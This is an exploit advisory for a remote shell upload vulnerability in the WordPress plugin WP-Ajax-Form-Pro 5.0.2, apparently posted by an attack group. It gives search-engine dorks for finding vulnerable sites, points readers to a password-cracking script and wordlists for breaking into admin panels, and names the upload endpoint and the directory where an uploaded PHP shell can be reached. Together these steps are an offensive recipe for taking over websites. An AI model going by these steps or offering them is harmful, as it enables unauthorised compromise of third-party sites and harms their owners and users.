>Exploit Title : WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability
>Exploit Author: The Mechiavellian || "facebook.com/TheMachiavellian/"
>Vendor Homepage || Software link : ajaxformpro.com
>Software Price : 19$ - 89$
>Version : 5.0.2
>Google Dorks : 
- inurl:''/wp-content/plugins/wp-ajax-form-pro''
- intext:''AJAX Form Pro - All Rights Reserved''

>Admin Panel Login Path : 
http://website.com/wp-login.php

[+] use my account dictionnary crack script : https://github.com/adem313/glory/blob/master/r.py
 - use wordpress wordlists to hack the admin panel

>Arbitrary File Upload/Remote Shell Upload Exploit : 
/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp

 >Directory File Path : 
/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/uploads/YourShellhere.php
[+] accept : .php - .gif  - .jpg - .png - .html - .fla - .pdf



exploit by Cyberizm Digital Security Team